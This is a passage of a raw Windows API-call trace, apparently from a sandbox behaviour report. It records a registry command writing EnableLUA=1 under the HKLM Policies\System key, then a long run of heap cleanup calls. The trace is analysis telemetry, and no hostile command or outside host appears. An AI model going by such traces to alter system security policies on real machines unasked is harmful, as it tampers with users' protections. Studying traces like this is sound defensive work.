(lpStart="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", wMatch=0x5c) returned="\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" [0072.802] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0072.802] GetProcessHeap () returned 0x2d0000 [0072.802] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x28) returned 0x2e5cb0 [0072.802] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 3 [0072.802] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_USER", cchCount2=-1) returned 3 [0072.802] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCR", cchCount2=-1) returned 3 [0072.802] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CLASSES_ROOT", cchCount2=-1) returned 3 [0072.802] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCC", cchCount2=-1) returned 3 [0072.802] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_CONFIG", cchCount2=-1) returned 3 [0072.802] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKLM", cchCount2=-1) returned 2 [0072.802] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 57 [0072.802] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 57 [0072.802] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 57 [0072.802] StrChrIW (lpStart="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", wMatch=0x5c) returned="\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" [0072.802] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 57 [0072.802] StrChrIW (lpStart="Microsoft\\Windows\\CurrentVersion\\Policies\\System", wMatch=0x5c) returned="\\Windows\\CurrentVersion\\Policies\\System" [0072.802] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 57 [0072.802] StrChrIW (lpStart="Windows\\CurrentVersion\\Policies\\System", wMatch=0x5c) returned="\\CurrentVersion\\Policies\\System" [0072.802] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 57 [0072.802] StrChrIW (lpStart="CurrentVersion\\Policies\\System", wMatch=0x5c) returned="\\Policies\\System" [0072.803] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 57 [0072.803] StrChrIW (lpStart="Policies\\System", wMatch=0x5c) returned="\\System" [0072.803] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 57 [0072.803] StrChrIW (lpStart="System", wMatch=0x5c) returned 0x0 [0072.803] SetLastError (dwErrCode=0x490) [0072.803] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 57 [0072.803] SetLastError (dwErrCode=0x0) [0072.803] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 57 [0072.803] GetProcessHeap () returned 0x2d0000 [0072.803] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x74) returned 0x2ebb80 [0072.803] GetProcessHeap () returned 0x2d0000 [0072.803] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0xa0) returned 0x2ebc00 [0072.803] GetProcessHeap () returned 0x2d0000 [0072.803] GetProcessHeap () returned 0x2d0000 [0072.803] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5cb0) returned 1 [0072.803] GetProcessHeap () returned 0x2d0000 [0072.803] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5cb0) returned 0x28 [0072.803] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5cb0 | out: hHeap=0x2d0000) returned 1 [0072.803] GetProcessHeap () returned 0x2d0000 [0072.803] GetProcessHeap () returned 0x2d0000 [0072.803] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb900) returned 1 [0072.803] GetProcessHeap () returned 0x2d0000 [0072.803] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eb900) returned 0x7e [0072.803] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb900 | out: hHeap=0x2d0000) returned 1 [0072.803] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0072.803] lstrlenW (lpString="EnableLUA") returned 9 [0072.803] GetProcessHeap () returned 0x2d0000 [0072.803] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x14) returned 0x2eb710 [0072.803] lstrlenW (lpString="EnableLUA") returned 9 [0072.803] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0072.803] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0072.804] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0072.804] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0072.804] StrChrW (lpStart=" \x09", wMatch=0x62) returned 0x0 [0072.804] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0072.804] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0072.804] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0072.804] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0072.804] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0072.804] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0072.804] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0072.804] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0072.804] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0072.804] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 2 [0072.804] StrDupW (lpSrch="REG_DWORD") returned="REG_DWORD" [0072.804] lstrlenW (lpString="REG_DWORD") returned 9 [0072.804] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0072.804] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0072.804] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0072.804] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0072.804] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0072.804] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0072.804] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0072.804] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0072.804] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0072.804] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0072.804] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_DWORD", cchCount1=-1, lpString2="REG_SZ", cchCount2=-1) returned 1 [0072.804] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_DWORD", cchCount1=-1, lpString2="REG_EXPAND_SZ", cchCount2=-1) returned 1 [0072.804] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_DWORD", cchCount1=-1, lpString2="REG_MULTI_SZ", cchCount2=-1) returned 1 [0072.804] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_DWORD", cchCount1=-1, lpString2="REG_BINARY", cchCount2=-1) returned 3 [0072.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_DWORD", cchCount1=-1, lpString2="REG_DWORD", cchCount2=-1) returned 2 [0072.805] LocalFree (hMem=0x2eb900) returned 0x0 [0072.805] SetLastError (dwErrCode=0x0) [0072.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0072.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0072.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0072.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0072.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0072.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0072.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0072.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0072.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 2 [0072.805] lstrlenW (lpString="1") returned 1 [0072.805] GetProcessHeap () returned 0x2d0000 [0072.805] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x4) returned 0x2eb900 [0072.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0072.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0072.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0072.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0072.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0072.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0072.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0072.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0072.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 3 [0072.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-d", cchCount2=-1) returned 1 [0072.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0072.805] SetLastError (dwErrCode=0x0) [0072.805] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x16fd00, lpdwDisposition=0x16fd20 | out: phkResult=0x16fd00*=0x54, lpdwDisposition=0x16fd20*=0x2) returned 0x0 [0072.805] RegQueryValueExW (in: hKey=0x54, lpValueName="EnableLUA", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0072.806] GetProcessHeap () returned 0x2d0000 [0072.806] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5cb0 [0072.806] GetProcessHeap () returned 0x2d0000 [0072.806] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5ce0 [0072.806] GetProcessHeap () returned 0x2d0000 [0072.806] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2eb920 [0072.806] _memicmp (_Buf1=0x2eb920, _Buf2=0xfff51458, _Size=0x7) returned 0 [0072.806] GetProcessHeap () returned 0x2d0000 [0072.806] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x200) returned 0x2ebcb0 [0072.806] LoadStringW (in: hInstance=0x0, uID=0xca, lpBuffer=0x2ebcb0, cchBufferMax=256 | out: lpBuffer="Value %s exists, overwrite(Yes/No)? ") returned 0x24 [0072.807] lstrlenW (lpString="Value %s exists, overwrite(Yes/No)? ") returned 36 [0072.807] GetProcessHeap () returned 0x2d0000 [0072.807] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x4a) returned 0x2ebec0 [0072.807] _memicmp (_Buf1=0x2eb920, _Buf2=0xfff51458, _Size=0x7) returned 0 [0072.807] LoadStringW (in: hInstance=0x0, uID=0xce, lpBuffer=0x2ebcb0, cchBufferMax=256 | out: lpBuffer="YNA") returned 0x3 [0072.807] lstrlenW (lpString="YNA") returned 3 [0072.807] GetProcessHeap () returned 0x2d0000 [0072.807] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x8) returned 0x2eb940 [0072.807] GetThreadLocale () returned 0x409 [0072.807] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="1", cchCount1=2, lpString2="0x", cchCount2=2) returned 3 [0072.807] _memicmp (_Buf1=0x2eb6d0, _Buf2=0xfff51458, _Size=0x7) returned 0 [0072.807] lstrlenW (lpString="1") returned 1 [0072.807] lstrlenW (lpString="1") returned 1 [0072.807] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0072.807] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0072.807] lstrlenW (lpString="1") returned 1 [0072.807] _errno () returned 0x5b4bb0 [0072.807] _errno () returned 0x5b4bb0 [0072.807] lstrlenW (lpString="") returned 0 [0072.807] _memicmp (_Buf1=0x2eb6d0, _Buf2=0xfff51458, _Size=0x7) returned 0 [0072.807] lstrlenW (lpString="1") returned 1 [0072.807] lstrlenW (lpString="1") returned 1 [0072.807] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0072.807] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0072.807] lstrlenW (lpString="1") returned 1 [0072.807] _errno () returned 0x5b4bb0 [0072.807] _errno () returned 0x5b4bb0 [0072.807] lstrlenW (lpString="") returned 0 [0072.808] RegSetValueExW (in: hKey=0x54, lpValueName="EnableLUA", Reserved=0x0, dwType=0x4, lpData=0x16fd08*=0x1, cbData=0x4 | out: lpData=0x16fd08*=0x1) returned 0x0 [0072.808] RegCloseKey (hKey=0x54) returned 0x0 [0072.808] GetProcessHeap () returned 0x2d0000 [0072.808] GetProcessHeap () returned 0x2d0000 [0072.808] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebb80) returned 1 [0072.808] GetProcessHeap () returned 0x2d0000 [0072.808] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebb80) returned 0x74 [0072.808] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebb80 | out: hHeap=0x2d0000) returned 1 [0072.808] GetProcessHeap () returned 0x2d0000 [0072.808] GetProcessHeap () returned 0x2d0000 [0072.808] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebc00) returned 1 [0072.808] GetProcessHeap () returned 0x2d0000 [0072.808] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebc00) returned 0xa0 [0072.808] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebc00 | out: hHeap=0x2d0000) returned 1 [0072.808] GetProcessHeap () returned 0x2d0000 [0072.808] GetProcessHeap () returned 0x2d0000 [0072.808] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb710) returned 1 [0072.808] GetProcessHeap () returned 0x2d0000 [0072.808] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eb710) returned 0x14 [0072.808] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb710 | out: hHeap=0x2d0000) returned 1 [0072.808] GetProcessHeap () returned 0x2d0000 [0072.808] GetProcessHeap () returned 0x2d0000 [0072.808] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb900) returned 1 [0072.808] GetProcessHeap () returned 0x2d0000 [0072.808] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eb900) returned 0x4 [0072.808] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb900 | out: hHeap=0x2d0000) returned 1 [0072.808] SetLastError (dwErrCode=0x0) [0072.808] GetLastError () returned 0x0 [0072.808] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x16fc80, nSize=0x0, Arguments=0x0 | out: lpBuffer="뮀.") returned 0x27 [0072.810] GetLastError () returned 0x0 [0072.810] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0072.810] GetProcessHeap () returned 0x2d0000 [0072.810] GetProcessHeap () returned 0x2d0000 [0072.810] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb650) returned 1 [0072.810] GetProcessHeap () returned 0x2d0000 [0072.810] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eb650) returned 0x2 [0072.810] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb650 | out: hHeap=0x2d0000) returned 1 [0072.810] GetProcessHeap () returned 0x2d0000 [0072.810] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x50) returned 0x2ebbe0 [0072.810] SetLastError (dwErrCode=0x0) [0072.810] LocalFree (hMem=0x2ebb80) returned 0x0 [0072.810] __iob_func () returned 0x7fefdf72a80 [0072.810] _fileno (_File=0x7fefdf72ab0) returned 1 [0072.810] _errno () returned 0x5b4bb0 [0072.810] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.810] _errno () returned 0x5b4bb0 [0072.810] GetFileType (hFile=0x7) returned 0x2 [0072.810] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0072.810] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16fc00 | out: lpMode=0x16fc00) returned 1 [0072.811] __iob_func () returned 0x7fefdf72a80 [0072.811] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0072.811] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0072.811] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x2ebbe0*, nNumberOfCharsToWrite=0x27, lpNumberOfCharsWritten=0x16fc70, lpReserved=0x0 | out: lpBuffer=0x2ebbe0*, lpNumberOfCharsWritten=0x16fc70*=0x27) returned 1 [0072.811] GetProcessHeap () returned 0x2d0000 [0072.811] GetProcessHeap () returned 0x2d0000 [0072.811] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebcb0) returned 1 [0072.811] GetProcessHeap () returned 0x2d0000 [0072.811] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebcb0) returned 0x200 [0072.811] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebcb0 | out: hHeap=0x2d0000) returned 1 [0072.811] GetProcessHeap () returned 0x2d0000 [0072.811] GetProcessHeap () returned 0x2d0000 [0072.811] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb920) returned 1 [0072.811] GetProcessHeap () returned 0x2d0000 [0072.811] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eb920) returned 0x18 [0072.811] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb920 | out: hHeap=0x2d0000) returned 1 [0072.811] GetProcessHeap () returned 0x2d0000 [0072.811] GetProcessHeap () returned 0x2d0000 [0072.811] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5ce0) returned 1 [0072.811] GetProcessHeap () returned 0x2d0000 [0072.811] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5ce0) returned 0x20 [0072.812] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5ce0 | out: hHeap=0x2d0000) returned 1 [0072.812] GetProcessHeap () returned 0x2d0000 [0072.812] GetProcessHeap () returned 0x2d0000 [0072.812] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb870) returned 1 [0072.812] GetProcessHeap () returned 0x2d0000 [0072.812] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eb870) returned 0x84 [0072.812] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb870 | out: hHeap=0x2d0000) returned 1 [0072.812] GetProcessHeap () returned 0x2d0000 [0072.812] GetProcessHeap () returned 0x2d0000 [0072.812] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb6f0) returned 1 [0072.812] GetProcessHeap () returned 0x2d0000 [0072.812] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eb6f0) returned 0x18 [0072.812] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb6f0 | out: hHeap=0x2d0000) returned 1 [0072.812] GetProcessHeap () returned 0x2d0000 [0072.812] GetProcessHeap () returned 0x2d0000 [0072.812] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5bf0) returned 1 [0072.812] GetProcessHeap () returned 0x2d0000 [0072.812] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5bf0) returned 0x20 [0072.812] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5bf0 | out: hHeap=0x2d0000) returned 1 [0072.812] GetProcessHeap () returned 0x2d0000 [0072.812] GetProcessHeap () returned 0x2d0000 [0072.812] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5c80) returned 1 [0072.812] GetProcessHeap () returned 0x2d0000 [0072.812] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5c80) returned 0x1e [0072.812] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5c80 | out: hHeap=0x2d0000) returned 1 [0072.812] GetProcessHeap () returned 0x2d0000 [0072.812] GetProcessHeap () returned 0x2d0000 [0072.812] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb6d0) returned 1 [0072.812] GetProcessHeap () returned 0x2d0000 [0072.812] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eb6d0) returned 0x18 [0072.812] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb6d0 | out: hHeap=0x2d0000) returned 1 [0072.812] GetProcessHeap () returned 0x2d0000 [0072.812] GetProcessHeap () returned 0x2d0000 [0072.812] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5bc0) returned 1 [0072.812] GetProcessHeap () returned 0x2d0000 [0072.812] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5bc0) returned 0x20 [0072.812] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5bc0 | out: hHeap=0x2d0000) returned 1 [0072.813] GetProcessHeap () returned 0x2d0000 [0072.813] GetProcessHeap () returned 0x2d0000 [0072.813] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebbe0) returned 1 [0072.813] GetProcessHeap () returned 0x2d0000 [0072.813] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebbe0) returned 0x50 [0072.813] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebbe0 | out: hHeap=0x2d0000) returned 1 [0072.813] GetProcessHeap () returned 0x2d0000 [0072.813] GetProcessHeap () returned 0x2d0000 [0072.813] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5a10) returned 1 [0072.813] GetProcessHeap () returned 0x2d0000 [0072.813] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5a10) returned 0x20 [0072.813] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5a10 | out: hHeap=0x2d0000) returned 1 [0072.813] GetProcessHeap () returned 0x2d0000 [0072.813] GetProcessHeap () returned 0x2d0000 [0072.813] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebec0) returned 1 [0072.813] GetProcessHeap () returned 0x2d0000 [0072.813] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebec0) returned 0x4a [0072.813] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebec0 | out: hHeap=0x2d0000) returned 1 [0072.813] GetProcessHeap () returned 0x2d0000 [0072.813] GetProcessHeap () returned 0x2d0000 [0072.813] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5a40) returned 1 [0072.813] GetProcessHeap () returned 0x2d0000 [0072.813] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5a40) returned 0x20 [0072.813] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5a40 | out: hHeap=0x2d0000) returned 1 [0072.813] GetProcessHeap () returned 0x2d0000 [0072.813] GetProcessHeap () returned 0x2d0000 [0072.813] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb940) returned 1 [0072.813] GetProcessHeap () returned 0x2d0000 [0072.813] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eb940) returned 0x8 [0072.813] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb940 | out: hHeap=0x2d0000) returned 1 [0072.813] GetProcessHeap () returned 0x2d0000 [0072.813] GetProcessHeap () returned 0x2d0000 [0072.813] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5a70) returned 1 [0072.813] GetProcessHeap () returned 0x2d0000 [0072.813] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5a70) returned 0x20 [0072.813] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5a70 | out: hHeap=0x2d0000) returned 1 [0072.813] GetProcessHeap () returned 0x2d0000 [0072.813] GetProcessHeap () returned 0x2d0000 [0072.814] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5aa0) returned 1 [0072.814] GetProcessHeap () returned 0x2d0000 [0072.814] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5aa0) returned 0x20 [0072.814] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5aa0 | out: hHeap=0x2d0000) returned 1 [0072.814] GetProcessHeap () returned 0x2d0000 [0072.814] GetProcessHeap () returned 0x2d0000 [0072.814] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb670) returned 1 [0072.814] GetProcessHeap () returned 0x2d0000 [0072.814] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eb670) returned 0x18 [0072.814] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb670 | out: hHeap=0x2d0000) returned 1 [0072.814] GetProcessHeap () returned 0x2d0000 [0072.814] GetProcessHeap () returned 0x2d0000 [0072.814] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5ad0) returned 1 [0072.814] GetProcessHeap () returned 0x2d0000 [0072.814] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5ad0) returned 0x20 [0072.814] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5ad0 | out: hHeap=0x2d0000) returned 1 [0072.814] GetProcessHeap () returned 0x2d0000 [0072.814] GetProcessHeap () returned 0x2d0000 [0072.814] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5b00) returned 1 [0072.814] GetProcessHeap () returned 0x2d0000 [0072.814] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5b00) returned 0x20 [0072.814] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5b00 | out: hHeap=0x2d0000) returned 1 [0072.814] GetProcessHeap () returned 